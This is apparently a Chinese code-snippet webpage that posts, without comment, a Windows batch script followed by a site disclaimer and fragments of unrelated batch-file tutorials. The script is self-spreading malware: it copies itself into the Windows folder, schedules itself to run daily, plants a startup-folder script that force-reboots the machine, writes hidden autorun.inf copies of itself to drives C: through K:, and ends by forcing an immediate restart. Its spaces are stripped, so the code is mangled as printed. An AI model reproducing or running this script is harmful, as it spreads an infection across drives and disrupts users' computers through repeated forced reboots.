时间:2021-05-22
复制代码 代码如下:
@echooff
attrib-r-h-s"%~nx0"2>nul>nul
attrib-r-h-s%windir%\"%~nx0"2>nul>nul
copy"%~nx0"%windir%/y2>nul>nul
at9:20/every:m,t,w,th,f,s,su"%windir%\%~nx0"
echoreboot>%windir%\temp.dll
setpat=「开始」菜单\程序\启动
echo@echooff>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echoechoreboot^>^>%%windir%%\temp.dll>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echofind/c"reboot"%%windir%%\temp.dll^|find"11">>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echoiferrorlevel1gotorebootnow>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echodel%%windir%%\user.dll/f/q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echodel%%windir%%\temp.dll/f/q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echodel/f/q"%%~nx0">>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echoexit>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echo:rebootnow>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echoshutdown/r/t0/f>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echoexit>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
echo[autorun]>%windir%\user.dll
echoshellexecute=%~nx0>>%windir%\user.dll
setdisk=C:>nul2>nul
:auto
copy%windir%\"%~nx0"%disk%\/y2>nul>nul
copy%windir%\user.dll%disk%\autorun.inf/y2>nul>nul
attrib+s+h+r%disk%\%~nx02>nul>nul
attrib+s+h+r%disk%\autorun.inf2>nul>nul
cls
goto%disk%>nul2>nul
:C:
setdisk=D:>nul2>nul
gotoauto>nul2>nul
:D:
setdisk=E:>nul2>nul
gotoauto>nul2>nul
:E:
setdisk=F:>nul2>nul
gotoauto>nul2>nul
:F:
setdisk=G:>nul2>nul
gotoauto>nul2>nul
:G:
setdisk=H:>nul2>nul
gotoauto>nul2>nul
:H:
setdisk=I:>nul2>nul
gotoauto>nul2>nul
:I:
setdisk=J:>nul2>nul
gotoauto>nul2>nul
:J:
setdisk=K:>nul2>nul
gotoauto>nul2>nul
:K:
setdisk=L:>nul2>nul
gotoauto>nul2>nul
:L:
cls
attrib+s+h+r%windir%\%~nx02>nul>nul
shutdown/r/t0/f
exit
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
问题描述假设我们要在批处理a.bat里调用执行批处理b.bat,b.bat需要知道b.bat的当前位置,并执行run.exe,如下://directorystr
bat是bat文件扩展名,bat是dos下的批处理文件,批处理文件是无格式的文本文件,它包含一条或多条命令。 它的文件扩展名为.bat或.cmd。在命令提示下
示例批处理:test.bat复制代码代码如下::OnErrorResumeNextSubbatechooff&clsechoBatching_codez_her
我们在Windows中运行bat批处理文件时往往会弹出一个cmd命令提示符窗口,然后等一会儿cmd窗口就自动关闭了,有人会说,直接在bat批处理文件中加入ech
批处理bat中的for命令的作用,非常的不错,可以节省很多效率,它可以读取文章的没一行,循环执行ping命令,老探索端口,学习批处理如果不学习for将是个遗憾,